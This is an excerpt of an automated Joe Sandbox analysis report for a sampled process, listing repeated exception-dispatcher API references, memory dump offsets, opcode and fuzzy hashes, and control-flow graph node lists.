                                      • KiUserExceptionDispatcher.NTDLL ref: 005F8BEB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b5f847b0c3da9471715ba50b54c0f2519e646af06dac338473fbc5464183b017
                                      • Instruction ID: 7ff1fed78309f5672f1a170d9bcf674581f92694c10ac167233c2cfa4325823f
                                      • Opcode Fuzzy Hash: b5f847b0c3da9471715ba50b54c0f2519e646af06dac338473fbc5464183b017
                                      • Instruction Fuzzy Hash: 09C1D374E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1458 5f56d8-5f56f8 1459 5f56ff-5f57ac KiUserExceptionDispatcher 1458->1459 1460 5f56fa 1458->1460 1465 5f57b4-5f57c2 1459->1465 1460->1459 1466 5f5ada-5f5b0c 1465->1466 1467 5f57c8-5f57df 1465->1467 1470 5f57e6-5f57ef 1467->1470 1471 5f57e1 1467->1471 1472 5f5acd-5f5ad3 1470->1472 1471->1470 1473 5f5ad9 1472->1473 1474 5f57f4-5f586a 1472->1474 1473->1466 1479 5f5926-5f5980 1474->1479 1480 5f5870-5f58de 1474->1480 1489 5f5981-5f59cf 1479->1489 1490 5f5921-5f5924 1480->1490 1491 5f58e0-5f5920 1480->1491 1496 5f5ab8-5f5ac3 1489->1496 1497 5f59d5-5f5ab7 1489->1497 1490->1489 1491->1490 1499 5f5aca 1496->1499 1500 5f5ac5 1496->1500 1497->1496 1499->1472 1500->1499
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F57A3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6a2cb46dc75e624609cf6a52824ba11b798e482cf960f26e8263221924baa64d
                                      • Instruction ID: 70ab4eb7d1091fc0a743d585be7faa5e89ee129549f5342b8549cf8a0f104e63
                                      • Opcode Fuzzy Hash: 6a2cb46dc75e624609cf6a52824ba11b798e482cf960f26e8263221924baa64d
                                      • Instruction Fuzzy Hash: 58C1F374E00218CFDB14DFA5C994BADBBB2BF89305F2081A9D909AB355DB349E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F8793
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6bdbab22da52205aa182d92c44a10cb536ca777e1e333743b5041e3f1d571081
                                      • Instruction ID: 237ffe529c07e894d90bd26a21321cfcddae5373c03b20b2919c9657d0202518
                                      • Opcode Fuzzy Hash: 6bdbab22da52205aa182d92c44a10cb536ca777e1e333743b5041e3f1d571081
                                      • Instruction Fuzzy Hash: 9FC1C274E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F7A8B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f7bc2b1a71e5c6fcb21b1a03521a83bf61023d4e4c4279192fb4086a4f092af7
                                      • Instruction ID: 9f625f951dfb7381799a912ebbf2ad69ef10fca71f270de9830e891e6ba8421d
                                      • Opcode Fuzzy Hash: f7bc2b1a71e5c6fcb21b1a03521a83bf61023d4e4c4279192fb4086a4f092af7
                                      • Instruction Fuzzy Hash: B8C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1134 5f08f8-5f0918 1135 5f091f-5f09cc KiUserExceptionDispatcher 1134->1135 1136 5f091a 1134->1136 1141 5f09d4-5f09e2 1135->1141 1136->1135 1142 5f0cfa-5f0d2c 1141->1142 1143 5f09e8-5f09ff 1141->1143 1146 5f0a06-5f0a0f 1143->1146 1147 5f0a01 1143->1147 1148 5f0ced-5f0cf3 1146->1148 1147->1146 1149 5f0cf9 1148->1149 1150 5f0a14-5f0a8a 1148->1150 1149->1142 1155 5f0b46-5f0ba0 1150->1155 1156 5f0a90-5f0afe 1150->1156 1167 5f0ba1-5f0bef 1155->1167 1165 5f0b41-5f0b44 1156->1165 1166 5f0b00-5f0b40 1156->1166 1165->1167 1166->1165 1172 5f0cd8-5f0ce3 1167->1172 1173 5f0bf5-5f0cd7 1167->1173 1175 5f0cea 1172->1175 1176 5f0ce5 1172->1176 1173->1172 1175->1148 1176->1175
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F09C3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0f41a4dde26d829a436c06858c738eaf28d2b31bedb8bfe2b89fc4504a7d1883
                                      • Instruction ID: c0e06113717cd59f5b131c723e841ead687df564c4f5487c17a1b9b197e78426
                                      • Opcode Fuzzy Hash: 0f41a4dde26d829a436c06858c738eaf28d2b31bedb8bfe2b89fc4504a7d1883
                                      • Instruction Fuzzy Hash: 54C1F374E00218CFDB14DFA5C994BADBBB2BF89304F2491AAD909AB355DB345E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1620 5f63e0-5f6400 1621 5f6407-5f64b4 KiUserExceptionDispatcher 1620->1621 1622 5f6402 1620->1622 1627 5f64bc-5f64ca 1621->1627 1622->1621 1628 5f67e2-5f6814 1627->1628 1629 5f64d0-5f64e7 1627->1629 1632 5f64ee-5f64f7 1629->1632 1633 5f64e9 1629->1633 1634 5f67d5-5f67db 1632->1634 1633->1632 1635 5f64fc-5f6572 1634->1635 1636 5f67e1 1634->1636 1641 5f662e-5f6688 1635->1641 1642 5f6578-5f65e6 1635->1642 1636->1628 1653 5f6689-5f66d7 1641->1653 1651 5f6629-5f662c 1642->1651 1652 5f65e8-5f6628 1642->1652 1651->1653 1652->1651 1658 5f66dd-5f67bf 1653->1658 1659 5f67c0-5f67cb 1653->1659 1658->1659 1661 5f67cd 1659->1661 1662 5f67d2 1659->1662 1661->1662 1662->1634
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F64AB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 99aeaa9c375e39f6e5ec919bb4df428243b44bb4ad5e339d7ad5d107c7a85151
                                      • Instruction ID: 4417739ab6714df5a094a757fc232bcefe2a1f0be49943eff1deffbd5f8cadeb
                                      • Opcode Fuzzy Hash: 99aeaa9c375e39f6e5ec919bb4df428243b44bb4ad5e339d7ad5d107c7a85151
                                      • Instruction Fuzzy Hash: 5DC1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1728 5f6c90-5f6cb0 1729 5f6cb7-5f6d64 KiUserExceptionDispatcher 1728->1729 1730 5f6cb2 1728->1730 1735 5f6d6c-5f6d7a 1729->1735 1730->1729 1736 5f7092-5f70c4 1735->1736 1737 5f6d80-5f6d97 1735->1737 1740 5f6d9e-5f6da7 1737->1740 1741 5f6d99 1737->1741 1742 5f7085-5f708b 1740->1742 1741->1740 1743 5f6dac-5f6e22 1742->1743 1744 5f7091 1742->1744 1749 5f6ede-5f6f38 1743->1749 1750 5f6e28-5f6e96 1743->1750 1744->1736 1761 5f6f39-5f6f87 1749->1761 1759 5f6ed9-5f6edc 1750->1759 1760 5f6e98-5f6ed8 1750->1760 1759->1761 1760->1759 1766 5f6f8d-5f706f 1761->1766 1767 5f7070-5f707b 1761->1767 1766->1767 1769 5f707d 1767->1769 1770 5f7082 1767->1770 1769->1770 1770->1742
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F6D5B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e8943d2cbc9f3e5c747d1034d523d7b49ac03e8129eec5497a8200d8a529feb4
                                      • Instruction ID: 12fa36d333b6d5753ca09f231e6c3131c45a886a413a9731342e7ae7d54cfd4f
                                      • Opcode Fuzzy Hash: e8943d2cbc9f3e5c747d1034d523d7b49ac03e8129eec5497a8200d8a529feb4
                                      • Instruction Fuzzy Hash: E9C1D474E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F0113
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c87e94ab8b17f0f5149b5035fe1b7192c53420790e542f4024d38b70cfd342aa
                                      • Instruction ID: f7ddc3347235fdb605b479d17e6050681ffc23db7e0d604b6f6111fd6b8389f6
                                      • Opcode Fuzzy Hash: c87e94ab8b17f0f5149b5035fe1b7192c53420790e542f4024d38b70cfd342aa
                                      • Instruction Fuzzy Hash: BE416F70D09388CFDB05CFBAC8546ADBFB2AF8A304F24C06AC454AB2A6D7340949CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F5BFB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 000f62a34208457902ad0846ffde42106a30197ac0081a07f070505d0860f02c
                                      • Instruction ID: b61893c9cc5043ab30d1aedcab53e27767d8134bd483ed43ba947d021f3779fb
                                      • Opcode Fuzzy Hash: 000f62a34208457902ad0846ffde42106a30197ac0081a07f070505d0860f02c
                                      • Instruction Fuzzy Hash: AD41F670E00608CFEB18DFAAD4416EEBBF2AF89304F64D12AD514AB359EB345946CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F6903
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e5648e25cfe21469d07f8b89a9a57f39b973fbfd703b52ee3984423a07587be4
                                      • Instruction ID: 6ed7d615cc8e8e7c8c037f444952adb5a869b313393b8b9cc04ce3e75b904e35
                                      • Opcode Fuzzy Hash: e5648e25cfe21469d07f8b89a9a57f39b973fbfd703b52ee3984423a07587be4
                                      • Instruction Fuzzy Hash: A641D470E00208CBDB18DFAAD9516EEBBF2AF89304F24D129D514BB259DB345946CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F6053
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: dbf6d52751eaafa1b51ca4c81e7a3a09e9b27bc4c1b12832d178f9d06bfc071f
                                      • Instruction ID: 0ba69bff12a5deec931912eed993f26d6564b14c9f6806630a341e7d610435cb
                                      • Opcode Fuzzy Hash: dbf6d52751eaafa1b51ca4c81e7a3a09e9b27bc4c1b12832d178f9d06bfc071f
                                      • Instruction Fuzzy Hash: FC41F574E01208CFEB18DFAAC5446EEBBF2AF89304F24D12AD514AB399DB345945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F64AB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e0f9176745e13e689c294cb0e25a88d3718c492b4e9764dd8b98eaf6b6778ee6
                                      • Instruction ID: 48495f55b99850c4bfa06c3e80cd923e422becfa38fcea6bb8b5528a8f4b133b
                                      • Opcode Fuzzy Hash: e0f9176745e13e689c294cb0e25a88d3718c492b4e9764dd8b98eaf6b6778ee6
                                      • Instruction Fuzzy Hash: 6A41E270E01208CBEB18DFAAC5446EEBBF2BF89304F24D12AD514AB369DB345949CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F833B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: dd4fd81e0117911be33c70783dfcb8ac2dce3e8520e894b24dbdfc18f86bfd48
                                      • Instruction ID: c7b2c55875e6c99f263499f135a010239094f730067aa903ee5b574e576d9dd5
                                      • Opcode Fuzzy Hash: dd4fd81e0117911be33c70783dfcb8ac2dce3e8520e894b24dbdfc18f86bfd48
                                      • Instruction Fuzzy Hash: 4441D470E01208CBDB18DFAAC9546EEBBF2BF89304F24D129D514AB265EB345946CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F09C3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 67dd215df930a5117efbed208fc394bbbf28ee43b1f162857d97efd2f56354a9
                                      • Instruction ID: c83acdcc93b1d75f095734b2ab37c3dc96863839b0a3820d6500ed3cd88ddd10
                                      • Opcode Fuzzy Hash: 67dd215df930a5117efbed208fc394bbbf28ee43b1f162857d97efd2f56354a9
                                      • Instruction Fuzzy Hash: D941E470E05248CBDB18DFAAC9546AEFBB2AF89300F24D12AD514BB3A9DB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F7633
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 3d9a0db8c805fe5ca0a6e1624f24afc1ffc297deba19c5a10d21da577335517e
                                      • Instruction ID: 6af1a22270918606f96b25f8a383953d2b1ab6280da7bfe3c486b54dff8ba238
                                      • Opcode Fuzzy Hash: 3d9a0db8c805fe5ca0a6e1624f24afc1ffc297deba19c5a10d21da577335517e
                                      • Instruction Fuzzy Hash: A5410670D04248CBDB18DFAAC5546AEFBF2AF89300F24D12AD514AB359DB345945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F7EE3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 233810aa193c1d993d6ebaef49a473e267c2016db1b67a6e4bc551d0952f8033
                                      • Instruction ID: fdd2ae6148ecec193dbecd3ea0e7dd36e60a96863e173973f1dd4ae5155cf68f
                                      • Opcode Fuzzy Hash: 233810aa193c1d993d6ebaef49a473e267c2016db1b67a6e4bc551d0952f8033
                                      • Instruction Fuzzy Hash: CD41E470E00208CBDB18DFAAC9416EEBBF2BF89304F24D12AD514AB355DB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F056B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: dca85b76e26656dfd5c4eb70c62b707e42e0572d6972ea6ca65f31879d4a44b8
                                      • Instruction ID: 832aa7f447d7c7f340a7e47d1d1d5e858d3d9bcd8b3bf649c46a13f7261d1858
                                      • Opcode Fuzzy Hash: dca85b76e26656dfd5c4eb70c62b707e42e0572d6972ea6ca65f31879d4a44b8
                                      • Instruction Fuzzy Hash: D441D570E01208CBDB18DFAAC5446AEFBF2BF89304F24D12AD514AB395DB345945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F1B23
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 996f7b8f8d95e09465aa8f1df8c41a0780ff17135acfc607c7e0a154db37e753
                                      • Instruction ID: 594f391521f70506211477d2e37d394eccab5fb90af13ffa6f52aaf2d575407f
                                      • Opcode Fuzzy Hash: 996f7b8f8d95e09465aa8f1df8c41a0780ff17135acfc607c7e0a154db37e753
                                      • Instruction Fuzzy Hash: F641F670E00608CBEB18DFAAD5416EEBBF2AF88300F24C12AD514BB369DB345946CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F71DC
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c7cbee2d79dff07aada8841ce14077d3d7afc6cc884cb2c445e7176bdcdc58de
                                      • Instruction ID: 8558254c08a0da756bc1aa1de698984ddbae9a62895e72d75f6dcc8f6c961ea2
                                      • Opcode Fuzzy Hash: c7cbee2d79dff07aada8841ce14077d3d7afc6cc884cb2c445e7176bdcdc58de
                                      • Instruction Fuzzy Hash: B841F274E05208CFDB18DFAAD9406AEBBF2BF89304F24D12AD514AB269EB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F1273
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ebdb60b07cad5a35800765c048428ff199a1caaf3bce9912afae3438b509a10b
                                      • Instruction ID: 9ded2bab823b4a5227a1679aaa896b4891c7825a0e7841307e9977abb4606c5b
                                      • Opcode Fuzzy Hash: ebdb60b07cad5a35800765c048428ff199a1caaf3bce9912afae3438b509a10b
                                      • Instruction Fuzzy Hash: 7A41D470E01608CBDB18DFAAC5546EEBBF2AF89300F24C12AD515BB369DB344946CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F57A3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9e5e3e5ad89b8bccca16120ab8617a9d49f4126770deec377b2f2a9234bcfc55
                                      • Instruction ID: 440ea478c23bdfb271d27a62eea39bb4743e389a16444cd750c256a32ff1728a
                                      • Opcode Fuzzy Hash: 9e5e3e5ad89b8bccca16120ab8617a9d49f4126770deec377b2f2a9234bcfc55
                                      • Instruction Fuzzy Hash: 0741D370E05608CFDB18DFAAD5446AEFBF2AF89300F24C12AD514AB259EB345945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F0E1B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 135f8fe6ed1345624a381e60ffc2b4f8ac5de63e88a271a4b35a397be5cdb1bc
                                      • Instruction ID: a4804ddbe1c0ef1c6434d4b82d86185c11ca61e1889d094c80d5740d9d93e014
                                      • Opcode Fuzzy Hash: 135f8fe6ed1345624a381e60ffc2b4f8ac5de63e88a271a4b35a397be5cdb1bc
                                      • Instruction Fuzzy Hash: 2C410570E05608CBDB18DFAAC9406AEBBF2BF89300F24D12AD514BB369DB344945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F9043
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ea5f2d3b56171eaf78868d6eb9d442e9e3614699afd4bc58d6be8e4082475b2f
                                      • Instruction ID: 7392d541f98c4129614abd7c33a2078df1f749f4bb1916ae80fc972e4334180f
                                      • Opcode Fuzzy Hash: ea5f2d3b56171eaf78868d6eb9d442e9e3614699afd4bc58d6be8e4082475b2f
                                      • Instruction Fuzzy Hash: E341F570E00608CBDB18DFAAC9546EEBBF2AF89304F24C12AD514BB3A5DB384945CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F16CB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 95c8026c18b9ad373079318d85b607b83c769b6bd06b48b3e37b7b8f15ba311e
                                      • Instruction ID: 8b955c5f4c23f7f43d32fbab79f3df8dd9a18a93872708e5f4c6ff9b8f5a2f23
                                      • Opcode Fuzzy Hash: 95c8026c18b9ad373079318d85b607b83c769b6bd06b48b3e37b7b8f15ba311e
                                      • Instruction Fuzzy Hash: 3241F470E01608CBEB18DFAAC5506AEBBB2AF89300F24D12AD514BB3A9DB344945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F8BEB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c5bc67b0f0d08fb1bebdaee80d51e62b14c709ed91819fc5b866f7755fa5d7e3
                                      • Instruction ID: 5439c71f6c2dbc92b7e68eb0fc317a4e6207bfbe5deadae00fc54ff1be465489
                                      • Opcode Fuzzy Hash: c5bc67b0f0d08fb1bebdaee80d51e62b14c709ed91819fc5b866f7755fa5d7e3
                                      • Instruction Fuzzy Hash: 2641C270E01208CBEB18DFAAD9406AEFBB2BF89304F24D12AD514BB369DB345945CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 0025BD5A
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_250000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 3b0dfebf0670aa7ff3089975a92938a06624091a92535124c79ad276e74b57a5
                                      • Instruction ID: 55ad9c218f773ae8ab8534872ff6afe3369e5110078bbcdd39bb77fe19618e26
                                      • Opcode Fuzzy Hash: 3b0dfebf0670aa7ff3089975a92938a06624091a92535124c79ad276e74b57a5
                                      • Instruction Fuzzy Hash: A85112B4D11208CFDB18CFAAD4486DDFBB2BF89315F24C12AE814AB294DB749949CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_250000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22cf4308231af1b92d99fb8e48fbcbe75d112992187f5e1e7a7f9b301de40803
